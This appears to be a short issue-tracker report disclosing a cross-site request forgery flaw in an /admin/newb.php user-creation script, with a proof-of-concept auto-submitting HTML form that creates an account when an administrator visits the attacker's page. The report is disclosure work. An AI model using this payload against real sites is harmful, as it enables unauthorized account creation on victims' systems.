CSRF Vulnerability in /admin/newb.php

Question

CSRF Vulnerability in /admin/newb.php

Opened this issue 7 years ago · 0 comments

/admin/newb.php
$username = $_POST['username'];
$email = $_POST['email'];
$password = $_POST['password'];

Obviously it does not implement a CSRF token, which makes it possible that a new user could be created once the admin visits the following web page

<form action="http://allendiskdemo.com/admin/newb.php" method="POST">
<input type=text name=username value=newuser>
<input type=text name=password value=passw0rd>
<input type=text name=email value=newuser@new.com>
</form>
<script>document.form[0].submit()</script>